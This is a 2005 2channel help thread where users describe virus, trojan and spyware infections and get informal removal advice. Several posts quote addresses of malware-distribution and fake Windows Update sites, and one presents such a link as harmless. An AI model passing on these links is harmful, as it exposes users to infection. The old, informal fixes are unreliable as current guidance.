不明。いつもと同じように仕事用のサイトや2チャンを見ていました。
関係ないかもしれませんが、リモートアシスタントを使おうと思ったら「現在のシステム設定が原因で招待を送信できません」とのメッセが出たので中止しました。
【これまでにとった措置】
ノートン・XoftSpyでスキャン。
ノートンは検出だけで削除はできないようです。
【その他の質問】
ノートンのサイトで対処法としてTopText. を[プログラムの追加と削除]で消すとなっていましたが、TopText.はありませんでした。
自分でGroove.x32 を削除しましたが、その後再スキャンしたところDc107.x32が検出されました。
こちらはCドライブに「RECYCLER」というフォルダが無いため消去できないでいます。
これらを削除するためにはどうしたら良いか教えてくださいm(_ _)m
317名無しさん@お腹いっぱい。:2005/04/08(金) 22:36:39
>>316
スパイウェア駆除ソフト使ってみたら?
318名無しさん@お腹いっぱい。:2005/04/08(金) 22:37:09
>>316
セーフモードで起動してからスキャンして削除 解決
319316:2005/04/08(金) 23:03:14
>>317-318

ありがとうございます。
セーフモードで起動後スキャンしてみます。
320マイクロソフトのWindowsの偽アップデートファイル:2005/04/08(金) 23:12:05
http://www.rbl.jp/phishing/
http://secure-accounting.com/update/?
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.dsnx.html

ファイルを分析しました。送られたそれぞれのファイルについてわかった
ことを以下に報告します。
ファイル名: Wupdate-20050401.exe
結果: このファイルは次のウィルスに感染しています:
Backdoor.DSNX

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスは
ウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。

microsoft.comの偽サイト ttp://secure-accounting.com/update/?
またWindows updateの偽サイトがドメインを割当て同じアドレスに出現しました。
アドレスは同じ221.151.249.236で韓国、OSはRed Hat Linux、Apache/2.0.40です。
ドメインsecure-accounting.comはwhoisで出てこないのですが登録されたばっかり
だからでしょうか。普通はそういうことは無いのですが。3domain.hkのDNSを使っ
ています。ここはダイナミックDNSサービスだそうです。不安定でサイトが見えた
り消えたりしています。いろいろいじっているのかもしれません。
リンクをクリックするとウイルスがダウンロードされるのでご注意。
321名無しさん@お腹いっぱい。:2005/04/08(金) 23:16:06
あー
最近PCおかしいと思ってウイルスバスターでスキャンしたがヒットなし。
んで今ギコナビひらいて風呂行ってきたんだが
帰ってきたらHDに何かがアクセスしててガリガリよみこんでる。
こりゃ絶対何かに感染してるんだろうけどウイルスバスターじゃヒットしないし・・・orz
こんな場合はどうすればいいのでしょうか?
322321:2005/04/08(金) 23:18:48
【使用OS】 Meタソ
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウイルスバスター2005
【ちゃんとUpdateしてるか】 PC立ち上げ時に毎回しています
【スキャンした結果(ウイルス名・発見場所)】 感染無し
【別のオンラインスキャンしたならその結果は】 まだしていません。
【症状を具体的に、分かる限りすべて書く】 HDDにガリガリアクセス等
【何をしたらそんなことになったのか】 ネトゲや2ch等
【これまでにとった措置】 外付けHDDに大切なファイル等を退避しました
【その他の質問】 321の本文どおりです。よろしくお願いします。
323名無しさん@お腹いっぱい。:2005/04/08(金) 23:18:58
>>321
シマンテックのオンラインスキャンとか
ついでに何か変なプロセスないかチェックしたらどうだ?
324名無しさん@お腹いっぱい。:2005/04/08(金) 23:22:10
>>320
どっちもソウルにサーバーがある
325名無しさん@お腹いっぱい。:2005/04/09(土) 00:00:49
>>323
レスありがとうございます。
ためしにセキュリティスキャンしてみましたが
木馬以外は要注意でしたorz
Meタンなのでふさいでもまた穴ができてしまうので仕方ないですが・・・
ウイルススキャンは寝る前にやってみようと思います。
ありがとうございました
326321:2005/04/09(土) 01:48:15
シマンテックのオンラインスキャンしてみたら
ギコナビのdatがウイルス感染?してたみたいです・・・_no
この場合はdatを全部削除すれば大丈夫なのでしょうか?
327名無しさん@お腹いっぱい。:2005/04/09(土) 02:26:13
>>326
シマンテックなら、単に
ウィルスコードが貼られてあるのを語検出してるだけかもしれんぞ。
328名無しさん@お腹いっぱい。:2005/04/09(土) 17:29:47
tp://www2ch.net/

このウイルス踏んじゃったんですけど・・・・。


329名無しさん@お腹いっぱい。:2005/04/09(土) 17:32:53
ブルース・ウィルス
330名無しさん@お腹いっぱい。:2005/04/09(土) 18:53:53
【使用OS】 MX
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 AVG6.0
【ちゃんとUpdateしてるか】 時々。。
【スキャンした結果(ウイルス名・発見場所)】 感染あり。でも削除しました
【別のオンラインスキャンしたならその結果は】 感染あり。でも削除しました
【症状を具体的に、分かる限りすべて書く】 トロイに感染してしまい、ウイルスチェックででたウイルスは削除しました
でもいまだにポップアップがでるのと、画面上で右クリックが出来ない&壁紙がかえられません。
c:window の中にpopupやtoppageというのがあるんですが、削除してもすぐに出てきてしまいます。
【何をしたらそんなことになったのか】2ch
【これまでにとった措置】 ウイルス削除(ad-aware, AVG)
海外住み&未成年なのでノートン買うことできません(つД`)
どうしたらいいでしょうか、助けてください。。
331330:2005/04/09(土) 18:55:41
【使用OS】 XPでした。。
本当に困っています。お願いします(つД`)
332名無しさん@お腹いっぱい。:2005/04/09(土) 19:11:40
>>330
まず、AVG6を7にしろ。
AD-AWAREもSEじゃないなら、AD-AWARESEに。
その後、セーフモードでスキャン
それでも消えないならewidoあたりを試せ
333名無しさん@お腹いっぱい。:2005/04/09(土) 19:17:18
A
334名無しさん@お腹いっぱい。:2005/04/09(土) 19:18:14
【使用OS】 XP
【WindowsUpdateしてるか】 自動更新
【AntiVirusは何を使っているか】 ノートンアンチウィルス2004
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 Adwere.Ezula Groove.X32
【別のオンラインスキャンしたならその結果は】 してない
【症状を具体的に、分かる限りすべて書く】 リスクファイルを削除できない
【何をしたらそんなことになったのか】 この前ウイルススキャンをしたら見つかりました。
【これまでにとった措置】 シマンテックのサイトで対策ファイルをダウンロードしましたが、効果がありませんでした。
ファイルは直接ゴミ箱に入れて削除しましたが、またしばらくしてファイルが復活していました。
【その他の質問】
335334:2005/04/09(土) 19:21:10
334訂正
【何をしたらそんなことになったのか】インターネット
336名無しさん@お腹いっぱい。:2005/04/09(土) 19:21:54
>>334
それって、元ネタがどこに居るか、ノートンでさえ不明なんだよ。そのスパィウェアが現れる前に、
変なEXEやら、フォルダやら、解凍したのに展開されないZIPやら変な動きのアプリがあったはず。
その元ファイルを検体としてシマンテック送らない限り、ワクチンのパターンは来ないよ。
337名無しさん@お腹いっぱい。:2005/04/09(土) 19:33:59
>>336
 そうですか、ノートンでは対処不可能ですか。
ショックウェーブフォルダ内にあったことを考えれば
ショックウェーブ関係なのでしょうか、
 スパイウェアということなので、Ad-Aware SE PersonalとSpybotかけてみます。
338名無しさん@お腹いっぱい。:2005/04/09(土) 19:40:19
ttp://www.medianetjapan.com/2/20/internet_computer/uhbvgy/file.html

これ踏んじゃったんだけどだいじょぶ?
339330:2005/04/09(土) 19:40:43
>>332
レスありがとうございます!
adはもうSEなので今AVGを7.0にしています。
セーフモードというのでスキャンしてみます!
340名無しさん@お腹いっぱい。:2005/04/09(土) 20:15:36
>>338
非IEなら後でキャッシュ消しとけばどうってことないけど
341338:2005/04/09(土) 20:21:43
>>340
IEなんだけど問題あり?
342名無しさん@お腹いっぱい。:2005/04/09(土) 20:43:26
>>341
かなりマズイ事になってる。とにかく、ウィルスじゃないし
セキュリティホールを突くのでもなくて、
アドオンとしてガンガン追加されちゃう。恐ろしい定義。
343316:2005/04/09(土) 21:35:29
すみません、もう一度教えてください。

>>319のようにセーフモードでスキャンをすると検出0なのに、
その後普通に立ち上げてスキャンすると>>316の結果になってしまいます。
(Cドライブに「RECYCLER」というフォルダが無いため検出されたファイルが消去できない)

>>317
CWShredder ver2.13.0.0を使いましたが解決できませんでした。

このファイルは消すことは出来ないのでしょうか?
よろしくお願い致します。
344名無しさん@お腹いっぱい。:2005/04/09(土) 21:47:23
私も338と同じやつゾヌで踏んじゃったんだよね。
あれってブラクラ?
途中で電源落としたんだけど。
ノートンは入れてるけど1月で期限きれてて更新してないんで、
最近出てきたやつならあぼーんかも、、


キャッシュ消す必要あり?
ありならどうやって消せばいいですか;
345名無しさん@お腹いっぱい。:2005/04/09(土) 21:50:03
>>343
RECYCLERって、「ゴミ箱」のことだべ。
表示させたいのなら、コントロールパネル→フォルダオプションの表示で
なんとかするべ。
346名無しさん@お腹いっぱい。:2005/04/09(土) 22:27:02
ノートンでスキャンしたらウイルスが二件検出されました。
ADWAREで修正削除がノートンではできませんでした。
スパイウエア駆除ツールでも削除できません。アドウエアでもです。
場所はc:\Dcuments and Settings\ユーザー名\Tenporary Internet
Files\Content.IE5\2H1M7ULW\bridge-c9[1]cabと表示されるのですが
イマイチどこなのか検討がつきません。
駆除するには直接やるしかないのでしょうがどうやればいいのか御指導
ください。
PCのOSはXPのSP2です。
以上宜しくお願いします。
347316:2005/04/09(土) 22:27:39
>>345

うわ〜消せたみたいです(汗
念のためにもう一度スキャンしてみます。

ありがとうございましたm(。_。;))m ペコペコ…
348名無しさん@お腹いっぱい。:2005/04/09(土) 22:36:06
>>346
IE→ツール→インターネットオプション→インターネット一時ファイル
でファイルの削除
349346:2005/04/09(土) 23:01:01
>>348
ありがとうございます。なおりました。
これってInternetのツールからじゃないと削除できないんですね。
ADWARE SEでも2個検出されたので削除したのですが、その後再びノートンで
スキャンを実行すると検出されるので、なんでだろうと思いました。
350名無しさん@お腹いっぱい。:2005/04/09(土) 23:37:33
スケベページ見るのも大変だね。プ
351名無しさん@お腹いっぱい。:2005/04/10(日) 00:45:46
やっぱウイルスの相談してくるやつは100%、エロサイトによる災害。
間違いない
352名無しさん@お腹いっぱい。:2005/04/10(日) 01:13:28
>>351 はたぶんエイズ患者に「誰とヤって伝染ったんだ」とか言いそうなタイプだな
353351:2005/04/10(日) 01:30:16
>>352
はあ?なんで?意味がわからん。
354344:2005/04/10(日) 01:48:38
344だけどエロサイトなんか見ないよ
実況に貼られててひっかかっちゃった・゚・(ノД`)・゚・

誰もレスしてくれないけど・・・
355名無しさん@お腹いっぱい。:2005/04/10(日) 02:16:22
>>344
>>1をよく読まないと誰も相手にしてくれませんよ
356344:2005/04/10(日) 03:07:05
【使用OS】 WinXP ゾヌ使用時
【WindowsUpdateしてるか】 一応
【AntiVirusは何を使っているか】 ノートンインターネットセキュリティー&アンチウィルス
【ちゃんとUpdateしてるか】 1月で期限切れ。。
【スキャンした結果(ウイルス名・発見場所)】 異常なし
【別のオンラインスキャンしたならその結果は】 してません。。
【症状を具体的に、分かる限りすべて書く】 CPUが100%になり、窓(拡張子はexe)が大量に開きかけた。
開いたページに書いてあった文章の中にMellissaというのが見えた気もする。
【何をしたらそんなことになったのか】 実況に貼られていたリンク(338さんの)を踏んでしまった
【これまでにとった措置】 慌てて電源を落とした。再起動後特に異常はない
【その他の質問】 何度も投稿すみません。ウィルスなのでしょうか?
対処すべきことがありましたらどうぞ教えて下さいませ;
357352:2005/04/10(日) 07:24:57
>>353
「100%」「間違いない」とか仰ってるけど、ちゃんと調べた上でのご発言ですよね?

まあ要は、ゲスな先入観に囚われてるとロクなことにならないってことですわ
358名無しさん@お腹いっぱい。:2005/04/10(日) 09:44:00
ウィルスやらスパイウェアやらに引っかかる奴は危機意識の薄いアフォ。
359名無しさん@お腹いっぱい。:2005/04/10(日) 12:56:37
>>358
そうか?俺なんか2chできれいにだまされた

↓↓↓の670はウイルスなのでリンクはふまないように。
ttp://ex9.2ch.net/test/read.cgi/f1/1112358603/
これの670(coolwebserachとかいっぱいはいってる)に
騙された。流れ的にこんなの予想不可能。
360名無しさん@お腹いっぱい。:2005/04/10(日) 13:24:58
>>359
踏んだら素直に何かもらって帰ってきちゃうようなヘタレには
2ちゃんねるはきついだろうな。
361名無しさん@お腹いっぱい。:2005/04/10(日) 14:02:56
>>359
スレの流れなんて誰もコントロールできない
中には悪意がある香具師もいる
鑑定スレいったりブラクラチェックしたり
色々回避する方法はあるお

踏んでも大丈夫とか
根本的解決にはいたってないけど
362名無しさん@お腹いっぱい。:2005/04/10(日) 15:38:40
サンデージャポンで朴の妄言

「地元・大阪では"永田"として活動していたのだから、その名前で報道するべき。
日本のマスコミはいつもそういう在日コリアンの晒し上げをするが、
まるで出自と犯罪に因果関係があるかのように扱っていて、危険な報じ方だ。」

ttp://gazo05.chbox.jp/news-movie/src/1113103985043.avi
363351:2005/04/10(日) 16:32:44
>>357
調べてないけど、殆どそうじゃねえ?下種な勘繰りとマジレスされても困る
が。ネタのつもりだったんだが。
364351:2005/04/10(日) 16:35:02
>>359
お前はあきらかに危機感なさすぎ不用意に踏むのではなく自分にスキル
がないなら鑑定してもらうなりの考えをもたないところが青いし、基本
的な2chルールがわかってない。
365名無しさん@お腹いっぱい。:2005/04/10(日) 16:40:34
>>362
そんな番組見るなよ(笑)
366名無しさん@お腹いっぱい。:2005/04/10(日) 18:41:18
おいおい・・・
困ってるエロ初心者が質問できなくて余計に困るだろうから
おまいら そこらへんでマターリしとけ

∧_∧
( ´・ω・)
( つ旦O
と_)_) 旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦


じゃあ 次の質問者サン ドゾー

367名無しさん@お腹いっぱい。:2005/04/10(日) 23:20:38
://lolworld.ecstazy.info/cjstats/index.html

ウイルス注意!
このURLを踏んでしまいました・・誰か助けてください!

使用OS】2000
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】avast!
【ちゃんとUpdateしてるか】 している。
【スキャンした結果(ウイルス名・発見場所)】 スキャン中
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 パソコンに繋げてあるスピーカーから音が出なくなった、後動作が重い気がする。
【何をしたらそんなことになったのか】 urlを踏んでしまった。
【これまでにとった措置】 avast!とpandaでスキャン
368名無しさん@お腹いっぱい。:2005/04/10(日) 23:58:58 BE:170165568-#
【使用OS】Win me
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】avast
【ちゃんとUpdateしてるか】はい
【スキャンした結果(ウイルス名・発見場所)】Astaber Win32が
                           RESTORE\tempから 発見
【別のオンラインスキャンしたならその結果は】しないでavastで処理しました
【症状を具体的に、分かる限りすべて書く】特になし
【何をしたらそんなことになったのか】不明
【その他の質問】 数日置きにスキャンしてますが毎回同じものが出ます。
           何が原因でしょうか?
369名無しさん@お腹いっぱい。:2005/04/11(月) 00:06:02 BE:95718839-#
>>368の追記です。

ウィルス名:Win32:Astaber-UPX [Wrm]
VPSバージョン:0514-3, 2005/04/10

こいつが毎回400近く検出されます。
370名無しさん@お腹いっぱい。:2005/04/11(月) 00:08:43
>>369
システムの復元切ってから駆除
371名無しさん@お腹いっぱい。:2005/04/11(月) 00:10:28 BE:63812636-#
>>370
復元を切るが、良くわかりません。
BIOSですか?コンパネですか?
372名無しさん@お腹いっぱい。:2005/04/11(月) 00:15:04 BE:42541362-#
>>370
あ、わかりました。やってみます。
失敗したらまた来ます。

ありがとうございました。
373名無しさん@お腹いっぱい。:2005/04/11(月) 00:55:09
【使用OS】 XP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 使っていませんでした
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】 いろいろやったのですがわかりませんでした
【別のオンラインスキャンしたならその結果は】 やりかたがわからず行っていません
【症状を具体的に、分かる限りすべて書く】 特にないのですが感染ファイルをewidoでスキャンして削除してもしばらくするとまた感染ファイルが見つかります
【何をしたらそんなことになったのか】 tp://virus.org.ua/unix/woid.jpg このリンクを踏んでしまいリンク先にあるウイルスらしきものに昨日感染しました
【これまでにとった措置】 ewidoからフリーのソフトをDLしスキャンと削除を行っています
【その他の質問】 このウイルスのもたらす被害と駆除方法をお願いします、2ちゃんも素人なので他板でも質問したのですが駆除につながる情報が得られなくてここに来ました
374名無しさん@お腹いっぱい。:2005/04/11(月) 01:08:14
なんでewidoだけは入ってんの?あり得ない。
375373:2005/04/11(月) 01:12:37
>>374
感染したあとに必死こいて調べて入れました
あとウイスルバスター2005も入れました
でもこちらはスキャンしてもウイルス検出してくれませんでした
素人なのでよくわからないのです
376名無しさん@お腹いっぱい。:2005/04/11(月) 01:20:51
>>375
アンチウィルスソフトはどんなPCにでも最初から必要なものだ。
そんなおまえはとりあえずネットをやめな。言えることはこれだけだ。
377375:2005/04/11(月) 01:23:47
>>376
そういうわけにはいきませんよ
いろいろとPCがないと困るのです…
それはこれからの対策で今感染したウイルスに関して駆除法を知りたいのです
378名無しさん@お腹いっぱい。:2005/04/11(月) 01:35:36
>>375
初心者には防御はできても駆除はできません。残念・・・。
379377:2005/04/11(月) 01:39:17
>>378
ちゃんと対応しているウイルスバスターを買えば駆除できますか?
380名無しさん@お腹いっぱい。:2005/04/11(月) 01:53:32
>>379
おれはNOD32を勧める。
381名無しさん@お腹いっぱい。:2005/04/11(月) 01:55:19
>>377
HTML_CRINET.A
この場合、12000回も訪問されるんじゃ被害者はM$だな。
キャッシュクリアしてVB2005の最新パターンファイルでスキャン。
漏れは寝るから訊き返さないでくれ。
382379:2005/04/11(月) 02:12:14
>>380
明日店できいてみますね

>>381
M$?


やはり専門の人呼ぶしかないかな…
383名無しさん@お腹いっぱい。:2005/04/11(月) 02:25:34
>>382

M$=Microsoft
384名無しさん@お腹いっぱい。:2005/04/11(月) 02:26:21
馬鹿はどこへ行ってもスルーされるだけだ
385382:2005/04/11(月) 02:33:19
>>383
ありがとうです

>>384
2ちゃんきびしい
386名無しさん@お腹いっぱい。:2005/04/11(月) 06:07:34
>>373=375=377=379=382

他スレでも散々回答さてれるにも関わらず
他スレで締め切りもせずここで自己認識した上でマルチ。
よって、ここでも以後スルーでよろ。
回答がでなければ専門家に依頼との事なので問題なし。
387名無しさん@お腹いっぱい。:2005/04/11(月) 07:01:09
【使用OS】 XP
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 ノートン2002
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 異常なし
【別のオンラインスキャンしたならその結果は】 異常なし

【症状を具体的に、分かる限りすべて書く】
削除しようとすると「送り側のディスクから読み取れません」とエラーのでる
フォルダがいつのまにか3つ生成されていた。(a,b,cとする)
その3つのフォルダ同士をドラッグ&ドロップ(aからc,cからbという風に)して
1つにするとなぜか上記のメッセは出ずに削除できる。
しかし削除後いったん閉じて生成場所を開くと、また生成されている。

【何をしたらそんなことになったのか】心当たりありすぎて検討も・・・

【その他の質問】
気づいてないだけかもしれませんが、他におかしい所は特に無いです。
やはり何かのウィルスでしょうか?
388名無しさん@お腹いっぱい。:2005/04/11(月) 07:06:48
>>387に追記
生成されるフォルダ名は前に一度落としたことのあるものの名前です
389名無しさん@お腹いっぱい。:2005/04/11(月) 07:16:50
W32/Coke.22231ってうウイルスが出てきたんですけど、どうすれば削除できます?
390名無しさん@お腹いっぱい。:2005/04/11(月) 07:31:58
ソフトで駆除
391名無しさん@お腹いっぱい。:2005/04/11(月) 10:12:20
ノートンとかのウイルス駆除のHPに
行こうとしてもいけないorz
392名無しさん@お腹いっぱい。:2005/04/11(月) 10:20:23
>>391
hostsリスト書き換えられてます。
393名無しさん@お腹いっぱい。:2005/04/11(月) 14:49:20
>>386

はぁ?なんだこのクズ
他スレの説明がわかりづらいからここにきたんだろうがオタクどもが専門用語ばっかつかいやがって
394名無しさん@お腹いっぱい。:2005/04/11(月) 16:03:55
>>387
もしかしてny使ってる?
395名無しさん@お腹いっぱい。:2005/04/11(月) 22:08:29
>>393
396名無しさん@お腹いっぱい。:2005/04/12(火) 02:28:43
>>393
bakamarudasi(w
397名無しさん@お腹いっぱい。:2005/04/12(火) 17:35:18
【使用OS】 XP
【WindowsUpdateしてるか】 再インストールしたばかりでしていなかった
【AntiVirusは何を使っているか】 ウイルスバスター2005
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】TROJ_SMALL.ZF C:\WINDOWS\system32\erenntma.exe
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 駆除をしても再起動すると復活する、ホームが書きかえられている、お気に入りに変なアドレスが追加されている
【何をしたらそんなことになったのか】 2chを見てて不覚にも引っかかった
【これまでにとった措置】 スパイウェア駆除、ウイルス駆除、システムの復元を無効に、一時ファイル削除
【その他の質問】 ウイルスバスターでTROJ_SMALL.ZFの詳細を見ようとしたら全部英語...orz
ウェブ翻訳使ったりしたけどさっぱりで;;
助言お願いします。。
398名無しさん@お腹いっぱい。:2005/04/12(火) 17:35:51
【別のオンラインスキャンしたならその結果は】 スキャン中
ついでにageます
399名無しさん@お腹いっぱい。:2005/04/12(火) 18:13:07
http://213.159.117.133/dl/ms.php
これを踏んだら何も表示されない真っ白なページが出てしまいその後パソが変になりました。
放っておいても大丈夫だ。
400名無しさん@お腹いっぱい。:2005/04/12(火) 18:22:59
スパイウエァの診断をしたら感染していました。
以下の状態ですとなにか私の個人情報など
外部に漏れている疑いがあるのでしょうか?
これらのスパイウエァの及ぼす影響を教えていただきたいです。
Adware:Adware/Gator 駆除不能 C:\Program Files\PrecisionTime\PrecisionTime.exe
Adware:Adware/Gator 駆除不能 C:\Program Files\DashBar
Spyware:Spyware/CnsMin 駆除不能 Windows レジストリ
401400:2005/04/12(火) 18:24:21
すみません書くところ間違えました。
402名無しさん@お腹いっぱい。:2005/04/12(火) 18:33:45
>>399
おまいは大丈夫でも他人も同じだと思うな。
スパイやウィルス満載のURLへの直リンなんか張るなボケ!
403名無しさん@お腹いっぱい。:2005/04/12(火) 19:02:11
>>399
直リンするな。市ね
404397:2005/04/12(火) 20:00:58
【別のオンラインスキャンしたならその結果は】 上のとは別のトロイウイルスが検出されました、、
でも駆除成功。しかし TROJ_SMALL.ZF は再起動しても出てます。。
TROJ_SMALL.ZF について詳しく知ってる方いましたら情報お願いします
405名無しさん@お腹いっぱい。:2005/04/12(火) 22:41:57
>101 萌える名無し画像 sage 2005/04/12(火) 18:44:21 ID:iBAR5Gmt
>ええけつしとるのぉ(*´Д`)ハァハァ
>http://192.168.11.2/
>http://192.168.11.2/~ss.jpg
>http://OEMCOMPUTER/
>http://OEMCOMPUTER/~ss.jpg


この手の書き込みをするウイルスがあるという話を聞いたのですが、
何か情報ありますか?
406405:2005/04/12(火) 22:57:12
自己解決。山田ウィルスというらしい。
まとめサイトらしい。

ttp://nemoba.seesaa.net/article/2891535.html
407名無しさん@お腹いっぱい。:2005/04/12(火) 22:59:25
【使用OS】
XP
【WindowsUpdateしてるか】
してます
【AntiVirusは何を使っているか】
ノートン2003
【ちゃんとUpdateしてるか】
してます
【スキャンした結果(ウイルス名・発見場所)】
1種類2個発見(ウイルス名Trojan Horse・発見場所C\Windows\system32¥vehewcb.exe)
【別のオンラインスキャンしたならその結果は】
今回見つかったウイルスとは別物のようですが、1週間前ぐらいに、トレンドマイクロとマカフィーでスキャンしたら、
トレンドマイクロでTROJ_BI.A、TROJ_DIALER.AM、TROJ_SWIZZOR.BT(他にも1種あったかもしれませんが、思い出せず、特定できませんでした)を検出しました。
約1週間前にスキャンした時点では、この別物と思われる3(+1)個のウイルスはトレンドマイクロでのみ検出されました。
【症状を具体的に、分かる限りすべて書く】
今のところ、とくに確認できませんでした。
【何をしたらそんなことになったのか】
わかりません。今日PCを立ち上げたら、PCGATE PersonalがTODO: <File description> vehewcb.exeのアクセス確認をしてきたので、
気になって検索し、vehewcbと名前がつくファイルをノートンでスキャンしたら、ウイルスが検出されました。
【これまでにとった措置】
ノートンでスキャンしましたが、削除できませんでした。
C\Windows\prefetchにもvehewcb.exeがあったので、ファイルを削除しました。
【その他の質問】
system32に2つあるvehewcb.exeは削除していませんが、削除していいのでしょうか?
MS-DOSファイルです。
1つのexeファイルの作成日は今日ですが、もうひとつのは2003年12月18になってます。

どうすればウイルスを削除できますでしょうか。
また考えられる被害などありましたら、お教え下さい。

よろしくお願いします。
408名無しさん@お腹いっぱい。:2005/04/12(火) 23:47:46
>>407
>【WindowsUpdateしてるか】
>してます
ほんと〜に〜?
スタート→ファイル名を指定して実行→regedit→OK
レジストリエディタが開くので、次の場所に移動する。
HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID
編集→検索で次のやつを検索にかけてみる。
{9F1C11AA-197B-4942-BA54-47A8489BB47F}
見つかったか?
409名無しさん@お腹いっぱい。:2005/04/12(火) 23:48:46
>>408補足
見つかっても絶対に削除してはならぬぞ。
起動できなくなるからな。
410407:2005/04/12(火) 23:57:10
最後のCLSIDが見つかりません。
411名無しさん@お腹いっぱい。:2005/04/13(水) 00:03:18
>>410
じゃあ、もう一度レジストリエディタ開いて。
次はレジストリエディタのマイコンピュータって奴を選択する。
編集→検索で{9F1C11AA-197B-4942-BA54-47A8489BB47F}を検索する。
(検索対象のキーにチェックを入れてよ)
見つかったら、報告して。
たぶん場所は以下だと思う。
HKEY_CLASSES_ROOT\CLSID
412名無しさん@お腹いっぱい。:2005/04/13(水) 00:09:54
しかしCLSIDが見つからないってどういうこと?
413名無しさん@お腹いっぱい。:2005/04/13(水) 00:18:09
ウイルス「Mytob」の亜種、再び大量に発生〜2日間で11種類出現
ttp://news.goo.ne.jp/news/internet/it/20050412/iw2005041205-internet.html
414407:2005/04/13(水) 00:36:31
やっぱりみつかりません・・・・・。

レジストリをすべて検索しましたって出るんですが、特に何も表示がないです。
415名無しさん@お腹いっぱい。:2005/04/13(水) 00:49:27
>>414
おかしい…じゃあ、デスクトップのマイコンピュータを開いて
C:\WINDOWS\Downloaded Program Filesの中身にあるアイコンの名前を
ここに全部貼ってくれ。
416407:2005/04/13(水) 01:14:59
こんなもんしかなかったです

{00000045-9980-0010-8000-00AA00389B71}
{1E89F686-B78D-4C85-9EFC-3474516E3FE2}
CInstall Class
Innotive Cibrowser Control 1.1
McFreeScan Class
NEC Content Update
Office Update Installation Engine
Quick Time Object
SassCln Object
Shockwave Flash Object
Yahoo! JAPAN Billiards
ウイルスバスター On-line Scan
417名無しさん@お腹いっぱい。:2005/04/13(水) 01:46:23
>>399
ひぃひっ、(((;゚Д゚)))ガクガクブルブル

冒険心で踏んでしまった・・・・_| ̄|○ ガックシ
418名無しさん@お腹いっぱい。:2005/04/13(水) 09:12:23
>>416
ノートンならセーフモードで起動して全ドライブをスキャン後に
発見されたものを削除すればいいんじゃなのか?
ほとんどのウィルスやスパイウェアの本体ファイルは
OSを通常起動すればプロセスが実行されてしまうので
OSに削除拒否されるぞ
419名無しさん@お腹いっぱい。:2005/04/13(水) 11:59:39
レジストリの各種設定と本体ファイルは表裏一体
どちらかを削除してしまえば実行されない
俺はレジストリの各種起動設定の削除の方が重要だと思っているんだが
ファイルだけ削除しても構わない
また、ファイルだけなら残っても、将来ウィルスだとベンダーが対応すればその時に検出される
420名無しさん@お腹いっぱい。:2005/04/13(水) 12:10:00
トレンドマイクロのオンラインスキャンで
WORM RBOT.BAV
が検出されたのですが
REGEDITでwinegg.exeを消したりしたのですがまだ検出されます
C:\SystemVolume Information\restore{17EC8DOF-A3FO-4A5A-9528-593CE8FCFCB7}\RP22\A0000743.exe
だそうです。
このワームの情報自身、検索でも情報が少なくて・・・
今はタスクマネージャでは活動して無いように見えますが
駆除方法を御教授してください。
OSはXPSP2
今現在はカウントダウンなど無いです
AVGをダウンロードしようとしてネットに接続したとたんに・・・
421名無しさん@お腹いっぱい。:2005/04/13(水) 12:21:38
微妙にすれ違い。
AVG(ttp://www.grisoft.com/doc/1)でどれを落とせばいいのか分からないです。英語むずかしい・・・。orz
WindouwsXP使用。
ウィルスを検疫・対処できるものが欲しいのですが。
422420:2005/04/13(水) 12:36:33
>421
http://free.grisoft.com/freeweb.php/doc/2/lng/us/tpl/v5
ここの下の方のフリーエディションだよ無料のが良いならね。
助けを求めてる俺が言うのもおこがましいけれどw
423名無しさん@お腹いっぱい。:2005/04/13(水) 12:40:09
どうもです〜。(・∀・)

30日間の無料期間が終わったらそっち移行しよっとw
424名無しさん@お腹いっぱい。:2005/04/13(水) 15:09:48
メールで「あなたが送ったメールにW32.Mytob.B@mmが含まれているので削除しました」
というのがあったので、
トレンドマイクロとシマンテックのオンラインスキャンで調べてみたのですが検出されません。
もう手詰まり状態で困ってるんですがどうすればいいでしょうか。
425407:2005/04/13(水) 15:10:58
一応、ノートンの完全スキャンで検疫出来たみたいです。
でもウイルスは一個だけでしたが。
>>418
ありがとうございます。
やってみます。

>>419
ありがとうございます。
できればレジストリを削除したほうがいいが、今の状況だと、レジストリが何か分からないから、
vehewcb.exeファイルを削除すればいいんですよね。

無知ですいません。
426名無しさん@お腹いっぱい:2005/04/13(水) 15:31:23
【使用OS】 windows me
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 VB2005
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 TROJ_WHENU.1・C:\WINDOWS\whenu.exe
【別のオンラインスキャンしたならその結果は】していない
【症状を具体的に、分かる限りすべて書く】 動作が遅い
【何をしたらそんなことになったのか】 分からない
【これまでにとった措置】 バスターで隔離済み
【その他の質問】 データベースにもこのウイルスの情報が無いため、
このウイルスの情報が知りたい(何をしようとしていたのか、どこから感染したのか)
427407:2005/04/13(水) 15:59:37
>>425
付け足し情報ですいません。

検疫したから、現在、system32フォルダのなかにあるvehewcbと名前がつくものは、
2つあったうちの1個の、MS-DOS プログラムへのショートカット、しか表示されていません。
これの作成日が2003年12月18です。これも削除していいんですかね。

また、たった今、通常モードでノートン完全スキャンしたら、感染は見つかりませんでした。
428名無しさん@お腹いっぱい。:2005/04/13(水) 17:11:35
>>427
余計なものを削除した不具合が怖いのなら、

隔離ファイル
隔離機能は、感染ファイルや不審なファイルを暗号化し、
適切な操作を実行できるようになるまで一時的に隔離フォルダに隔離します。
隔離されたファイルは、ウイルスを駆除した後、元の場所に復元できます。
429名無しさん@お腹いっぱい。:2005/04/14(木) 01:08:27
win2000Pro SP4なのですが、
